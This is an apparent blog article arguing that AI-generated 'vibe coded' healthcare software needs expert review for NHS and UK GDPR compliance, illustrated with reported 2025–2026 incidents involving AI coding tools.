The problem isn’t that AI can’t write working code. It’s that in healthcare, working code is the easy part. The hard part is proving, to regulators, clinicians, and auditors, that the software is compliant.
By “vibe coding” we mean building systems through AI prompting and shipping code without formal architecture review, compliance mapping, or clinical risk assessment. It’s an effective approach in many contexts. It’s also genuinely exciting that people from non-developer backgrounds are engaging with software development in their own ways. However, healthcare is a context where AI-generated code needs an extra layer of expert scrutiny before it goes anywhere near patients.
So let’s look at what compliance requires that AI doesn’t reliably provide, where generated code creates problems that only become visible late in a project, and what experienced developers bring to this work that cannot be replicated by prompting.
Examples of Vibe Coding Gone Wrong in 2026
Amazon 2025/2026
Amazon mandated that 80% of engineers use its AI coding assistant, Kiro, weekly. In December 2025, Kiro received operator-level permissions to fix a minor issue in AWS Cost Explorer. Rather than applying a targeted patch, it deleted and recreated the entire production environment. The outage lasted 13 hours.
Then, in March 2026, an AI-assisted deployment took Amazon’s retail site down for six hours, causing a reported 99% drop in US order volume. Amazon responded by mandating senior engineer sign-off on all AI-assisted production deployments. That response highlights why human review of AI output matters, even in well-resourced engineering teams.
Now consider what operator-level permissions mean in a medical application: access to patient records, clinical data, prescribing systems, and appointment infrastructure. An outage in that context isn’t a revenue number. That’s a clinical risk event.
Orchids, February 2026
Security researcher Etizaz Mohsin demonstrated a critical vulnerability in Orchids, a vibe-coding platform claiming one million users, to the BBC. In a controlled test, Mohsin accessed a BBC journalist’s active project remotely, inserted a single malicious line of code among thousands of AI-generated lines, and took full control of the journalist’s laptop, with zero interaction required from the victim. No phishing email. No link to click. The attack was invisible until a file appeared on the desktop. The vulnerability remained unfixed at the time of the BBC report.
What matters is the mechanism: AI-generated code that non-technical users cannot read or review, running with deep system access, on devices that in a healthcare context might hold patient data or connectivity to NHS infrastructure. In a medical application, an invisible code injection isn’t just a reputational problem. It’s a data breach, a DSP Toolkit incident, and potentially a criminal matter under the Computer Misuse Act.
OpenClaw, 2025–2026
AI-generated guardrail logic in OpenClaw, an open-source container security tool, failed to account for shell wrapper payloads. When /usr/bin/env was allowlisted by the AI-generated security policy, attackers used env-S to bypass policy analysis entirely and execute arbitrary commands at runtime. The AI had treated the security configuration as a linguistic pattern, matching a string against a list, rather than understanding the functional behaviour of what it was permitting. The allowlist looked correct. It was not.
This is the category of failure that is hardest to catch and most dangerous in a regulated environment: code that passes review, passes testing, and fails in a way that only becomes apparent when someone who understands the actual attack surface probes it deliberately.
Not sure whether your project applies under NHS compliance requirements or where to get started? The NHS has a new resources hub available for those wanting to use NHS resources in their project as well as access to the developer community open forum.
The Compliance Landscape AI Cannot Navigate
Several frameworks typically apply to healthcare software. These include UK GDPR and the Data Protection Act 2018, the NHS Digital Data Security and Protection Toolkit, and the Digital Technology Assessment Criteria (DTAC). Additionally, DCB0129 and DCB0160 clinical safety standards require mandatory hazard logs, safety cases, and designated clinical safety officers. MHRA regulations apply where the application qualifies as a medical device, and HL7 FHIR standards govern any application connecting to NHS systems.
Crucially, these frameworks interact. A clinical safety case under DCB0129 depends on a data flow analysis that shapes how UK GDPR obligations apply. DTAC draws on both. Furthermore, MHRA classification determines which ISO 13485 quality management requirements are triggered. Getting one wrong affects the others. Consequently, teams must make the decisions that determine how frameworks interact at the architectural level, before most of the code exists.
AI tools can surface fragments of this knowledge. Even so, they cannot reliably apply it in context, reason about how frameworks interact for a specific product, or take responsibility for the decisions.
Note that DTAC version 2 was introduced this year, and simplifies the assurance process slightly with 25% less questions and waves the NHS Digital Training requirement for clinical safety officers.
What to Watch out for
Audit trail gaps
Every creation, read, update, and deletion of patient data typically needs to be logged with a timestamp, a user identifier, the nature of the change, and often the reason. AI tools generate functional CRUD operations well. However, they rarely generate the immutable, tamper-evident access records that a Data Protection Impact Assessment or CQC inspection would expect. Application-level error logging is not the same as the immutable, tamper-evident access records a Data Protection Impact Assessment or a CQC inspection would expect to see. This distinction is not subtle, but it is consistently missed in AI-generated codebases.
Role-based access
AI-generated authentication tends toward the generic, admin versus user, authenticated versus unauthenticated. Clinical governance, by contrast, requires permission hierarchies that reflect actual roles. For example, clinicians may view certain record types but not others, administrators may access demographics but not clinical notes, and third-party integrations may need read-only access to specific data subsets. Getting this wrong produces unauthorised access to patient data — a notifiable breach under UK GDPR.
Data residency and storage by default
AI tools reach for whatever is convenient, a managed cloud database, a third-party service, a readily available API. Each of those choices carries data residency implications, data processor agreement requirements under UK GDPR, and potentially DSP Toolkit obligations. These are not decisions that should happen implicitly. They need to be made deliberately, documented, and reviewed against applicable standards before a line of storage code is written. Pseudonymisation versus anonymisation versus encryption. These are legally distinct categories under UK GDPR, each carrying different obligations. AI-generated code rarely distinguishes between them consistently.
Consent management complexity
Consent management remains a critical bottleneck due to the layered, revocable nature of healthcare data under UK GDPR and the NHS National Data Opt-Out (NDOO).
While traditional AI tools were limited to generating static UI components like checkboxes. The 2026 landscape features a widening gap between these basic designs and the sophisticated, ‘agentic’ systems required for modern compliance. Under the oversight of the National Commission into the Regulation of AI in Healthcare, there is now a strict requirement for AI to distinguish between data used for individual care, where consent is often implied, and secondary research, where the National Data Opt-Out must be respected in real-time.
Since AI tools are moving into direct patient interaction, they also face the ‘informed consent’ problem. They must now be capable of explaining their own complex logic to vulnerable adults and children. Which is a level of legal and ethical transparency that basic AI generation cannot yet autonomously provide.
Clinical safety in data display
How information is presented in a clinical context is a patient safety issue, not only a UX decision. A medication displayed in an ambiguous format, a lab result shown without reference ranges, a critical alert insufficiently surfaced, all of these can contribute to clinical error. DCB0129 clinical safety standards codify exactly these concerns. AI tools generating UI components have no mechanism for evaluating clinical safety risk. They produce what looks reasonable. Reasonable is not the same as safe.
Catching Problems too Late
Structural compliance failures tend to surface late. The code is functional. The demo is convincing. The MVP passes internal review. Then a DTAC submission, a penetration test, or an NHS procurement process reveals an architectural problem, that no patch can fix.
For example, adding audit logging retrospectively means touching every data access point in an application built over months. Similarly, authentication architecture that doesn’t meet NHS Identity requirements demands rearchitecting from the ground up. Additionally, a data model built without Fast Healthcare Interoperability Resources (FHIR) specifically FHIR UK Core, interoperability in mind. Then becomes very expensive to change once data exists in it and integrations depend on its structure.
The consequences extend beyond development cost. DTAC failures block NHS procurement entirely. DSPT compliance is mandatory for handling patient data. And a clinical safety case under DCB0129 that teams cannot complete, because they never identified the hazards. Which means the product cannot deploy at all.
A 2025 Stack Overflow survey found that 46% of developers don’t trust accuracy of AI tool output, up from 31% in 2024. Senior developers also reported spending more time debugging AI-generated code than human-written code. That underscores why AI is a powerful accelerant, but not a replacement for expert review.
Why Experienced Developers Are Essential for Healthcare
The contribution experienced developers make to medical software is primarily contextual, not syntactic. For instance, they know which regulatory framework applies to a specific feature decision. They recognise when a product requirement carries clinical safety implications that the team hasn’t surfaced. Spotting architectural patterns that will create compliance problems six months later when an NHS integration becomes necessary. As we found when building a sexual health chatbot for NHS trusts. Developers also understand that DTAC evidence requirements mean documentation must run throughout development, not get assembled at the end.
Overall...
If you’ve used AI tools or vibe coding to prototype your idea, that’s a great start. Getting something tangible built quickly is genuinely valuable, and it’s exactly the kind of initiative we want to support. The next step for any healthcare application, therefore, is to bring in a development team who understand the compliance landscape. They can assess what you’ve built, restructure it where needed, and take it safely through to deployment.
In short, the answer is not to avoid AI tools. Instead, use them in a role that matches their capability: accelerating implementation within a structure that people who understand compliance have defined. For healthcare software, that structure isn’t optional, and with the right team, it’s entirely achievable.


